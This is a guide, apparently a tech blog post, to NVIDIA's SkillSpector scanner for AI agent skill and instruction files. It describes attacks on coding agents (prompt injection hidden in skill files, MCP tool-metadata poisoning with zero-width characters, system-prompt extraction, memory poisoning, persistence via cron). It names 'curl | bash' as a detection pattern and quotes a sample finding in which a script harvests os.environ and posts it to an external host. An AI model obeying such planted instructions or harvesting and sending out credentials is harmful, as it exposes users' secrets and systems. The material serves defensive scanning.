AI Agent Skill Security: How to Scan CLAUDE.md, AGENTS.md, and Skill Files Before They Run

26.1% of AI agent skills contain security vulnerabilities, and 5.2% show likely malicious intent, per NVIDIA's research cited in the SkillSpector README. That is the finding to act on. A skill file is the CLAUDE.md, AGENTS.md, or SKILL.md that tools like Claude Code, Codex CLI, and Gemini CLI load automatically when they start, and roughly one in four of them carries a defect a scanner can catch before it runs. SkillSpector, NVIDIA's open-source scanner for exactly this surface, hit more than 7,000 stars (7.6k, per the repo's GitHub page) and trended #3 on GitHub's Python list this week, which tells you the gap is being taken seriously now rather than in the abstract.

This guide is for the developer or ops lead who installs third-party skill files, or who runs an agent in CI. We walk through what the threat actually is, how to scan a file in one command, how to read the score, and the one flag to set first.

What an agent skill is, and why it runs with no vetting step

An agent skill is plain instruction text plus, often, helper scripts. When Claude Code or Codex CLI opens a project, it reads the skill files in scope and folds them into the agent's context, and any scripts they reference run with your shell's privileges, per the SkillSpector README. There is no package registry, no signature check, no review queue. You clone a repo or paste a skill from a gist, the agent picks it up, and it executes with implicit OS trust the moment the session starts.

That is a different attack surface from the one we covered in TrustFall, which abused the MCP trust dialog to auto-run a server defined in .mcp.json. Same threat category, different door. TrustFall weaponized the config that loads tools. Skill files weaponize the instructions that steer the agent and the scripts they carry. If you are mapping the broader picture, our MCP stateless migration guide covers how the protocol layer underneath all of this has been shifting. The skill layer is the part with no gatekeeper at all, which is what makes the 26.1% number land.

What SkillSpector scans for

SkillSpector ships 64 vulnerability patterns across 16 categories, per the README. The full list is below. Three categories carry most of the real-world risk, so read those rows first.

Category	Patterns	What it catches
Prompt injection	5	Instructions that override safety constraints, hidden directives in comments or invisible text, commands to exfiltrate context
Data exfiltration	4	Env-variable harvesting (API keys), file-system enumeration, transmitting context to external URLs
MCP tool poisoning	4	Hidden directives in tool metadata (HTML comments, zero-width chars, base64), homoglyph and right-to-left deception, description-vs-behavior mismatch
Privilege escalation	3	Sudo/root execution, reading SSH keys and tokens
Supply chain	6	`curl \| bash` remote execution, obfuscated payloads, dependencies with known CVEs via a live OSV.dev lookup, typosquatting
Excessive agency	4	Unrestricted tool access, autonomous high-impact decisions with no human in the loop
Output handling	3	Model output used without sanitization across a trust boundary
System prompt leakage	3	Direct and indirect extraction of system prompts or internal rules
Memory poisoning	3	Content built to persist across sessions, context-window stuffing that displaces safety constraints
Tool misuse	3	Parameter abuse (`shell=True`, `--force`), chains that bypass per-tool checks
Rogue agent	2	Runtime self-modification, persistence via cron jobs or startup scripts
Trigger abuse	3	Triggers that shadow built-in commands, generic keyword baiting
Dangerous code (AST)	8	`exec()`, `eval()`, dynamic imports, `subprocess`, `os.system`, and chained execution
Taint tracking	5	Credential-to-network flows, file-read-to-exfiltration, external-input-to-code-execution
YARA signatures	4	Known malware, webshell, cryptominer, and exploit-tool matches
MCP least privilege	4	Capabilities used but not declared, wildcard permissions, missing permission fields

Source: SkillSpector README.

The dangerous three are at the top for a reason. Prompt injection is the one most people picture: a line buried in a skill that tells the agent to ignore its guardrails or quietly forward your context elsewhere. Data exfiltration is where a skill harvests os.environ and posts it to an external host, which is how a credential leak becomes a credential theft. MCP tool poisoning is the subtle one. It hides directives inside tool metadata using zero-width characters or homoglyphs, so the description a human reads and the instruction the model parses are not the same string. Static patterns plus optional LLM evaluation are how SkillSpector reaches those last two, since a homoglyph attack is invisible to a quick eyeball pass.

How to run a scan

SkillSpector needs Python 3.12+, per the README. Clone it, drop into a virtualenv, and run make install.

# Install from source (requires Python 3.12+)
git clone https://github.com/NVIDIA/skillspector.git
cd skillspector

# Create and activate a virtual environment
python3 -m venv .venv && source .venv/bin/activate

# Install for production use
make install

If you would rather not put Python on the box, build the image and run it in a container. SkillSpector ships a Dockerfile based on the official python:3.12-slim-bookworm image, per the README.

# Build the container, then scan the current directory mounted at /scan
make docker-build
docker run --rm -v "$PWD:/scan" skillspector scan ./my-skill/ --no-llm

Once installed, the scan target can be a directory, a single file, a Git URL, or a zip. The same scan verb covers all four input shapes.

# Scan a local skill directory
skillspector scan ./my-skill/

# Scan a single SKILL.md (or CLAUDE.md / AGENTS.md) file
skillspector scan ./SKILL.md

# Scan a Git repository directly
skillspector scan https://github.com/user/my-skill

A scan, start to finish

Here is the shape of a real run against a skill that harvests environment variables and ships them out. The input is a directory with a SKILL.md and a helper script; the command is a single static-only scan; the output is a risk score, a severity band, and the specific findings with line numbers.

Input: ./suspicious-skill/ containing SKILL.md and scripts/sync.py.

Command:

skillspector scan ./suspicious-skill/ --no-llm

Expected output (abbreviated):

 SkillSpector Security Report  v2.0.0

Skill: suspicious-skill
Source: ./suspicious-skill/

        Risk Assessment
 Metric          Value
 Score           78/100
 Severity        HIGH
 Recommendation  DO NOT INSTALL

Issues (2)

  HIGH: Env Variable Harvesting (E2)
    Location: scripts/sync.py:23
    Finding: for key, val in os.environ.items():...
    Confidence: 94%

  HIGH: External Transmission (E1)
    Location: scripts/sync.py:45
    Finding: requests.post("https://api.skill.io/env"...
    Confidence: 89%
# ... (component table and full explanations omitted)

The output above mirrors the example in the SkillSpector README. Two HIGH findings, one harvesting os.environ and one posting it to an external host, stack into a 78/100 HIGH score with a flat "DO NOT INSTALL" recommendation. That is the pattern the scanner is built to surface: not one smoking gun, but a chain.

Reading the results

The headline is a single number from 0 to 100, and each finding adds to it by severity, per the README: a CRITICAL issue is +50, a HIGH is +25, a MEDIUM is +10, a LOW is +5, and anything in an executable script gets a 1.3x multiplier on top. The total maps to four bands with a plain-language recommendation.

Score	Severity	Recommendation
0-20	LOW	SAFE
21-50	MEDIUM	CAUTION
51-80	HIGH	DO NOT INSTALL
81-100	CRITICAL	DO NOT INSTALL

Source: SkillSpector README.

The bands are deliberately blunt. Anything above 50 is a "do not install," full stop, and the scoring math means a single CRITICAL finding alone (50, before the executable multiplier) drops you into that zone. Treat MEDIUM as "read every finding by hand before you trust it," not as a passing grade.

For automation, the format that matters is SARIF. SkillSpector emits Terminal, JSON, Markdown, and SARIF, per the README, and SARIF is the one CI systems and IDEs speak. Write it to a file and a GitHub code-scanning workflow can ingest it like any other static-analysis result.

# Emit SARIF for CI / GitHub code scanning
skillspector scan ./my-skill/ --no-llm --format sarif --output report.sarif

That turns "is this skill safe" from a one-off question into a gate that runs on every change.

SkillSpector vs GitHub Copilot's validation: what each covers

A reasonable question: doesn't GitHub already do this? On June 9, 2026, GitHub made security validation for third-party coding agents generally available, extending to agents like Claude and OpenAI Codex the checks already running for Copilot's own cloud agent, per the GitHub changelog. When one of those agents opens a pull request, GitHub runs three checks on the code it wrote: CodeQL analysis, a dependency screen against the GitHub Advisory Database, and secret scanning. If it finds something, the agent tries to fix it before finalizing the PR.

That is real coverage, and it is the wrong layer for this problem. Copilot's validation looks at the code the agent generates. SkillSpector looks at the instruction files that configure the agent in the first place. A poisoned CLAUDE.md never shows up as a vulnerability in a generated diff, because the malicious part is the steering text, not the output. It can sit in your repo, shape every agent run, and pass CodeQL clean because there is no vulnerable code for CodeQL to find.

Layer	GitHub Copilot validation	SkillSpector
Agent-generated code in a PR	Covered (CodeQL, Advisory DB, secret scan)	Not the target
Skill / instruction files (`CLAUDE.md`, `AGENTS.md`, `SKILL.md`)	Not scanned	Covered (64 patterns)
MCP tool metadata poisoning	Not scanned	Covered
A subtle prompt injection that passes static checks	Gap	Reduced by LLM stage, not eliminated

Sources: GitHub changelog and SkillSpector README.

Neither fully closes the hardest case. A prompt injection written in clean prose with no executable tell can slip past static patterns, and SkillSpector's optional LLM evaluation reduces that risk without erasing it. The honest framing is layered defense: Copilot guards the output, SkillSpector guards the input, and a careful human still reads anything that scores MEDIUM or above.

The verdict: run it, and set one flag first

If your team installs third-party skill files, pulls agent configs from public repos, or runs any agent in CI, run SkillSpector. The decision is not close. There is no other open-source scanner aimed squarely at the skill-file surface, the install is a clone and a make install, and the 26.1% base rate, per the README, means a scan pays for itself the first time it flags a real one. The cost of skipping it is a poisoned instruction file steering an agent that already runs with your privileges.

Set --no-llm first. The static-only path needs no API key, runs fast enough to drop into a pre-commit hook or a CI job, and catches the executable and supply-chain patterns that do the most damage, per the README. Add the LLM stage later for the subtle prompt-injection and tool-poisoning cases once the fast gate is in place. The order matters: a fast static gate you actually run beats a thorough scan you skip because it is slow.

For a CI scan pipeline, the container path is the clean way to ship it. Build the image once, run it against every skill file on push, and emit SARIF into your code-scanning workflow with no Python on the runner at all. A managed VPS such as Cloudways gives you a persistent box to host that container and your scan pipeline without standing up infrastructure by hand. Point it at your repos, gate on a HIGH score, and the question "is this skill safe to install" stops being something you answer by reading and starts being something your pipeline answers for you.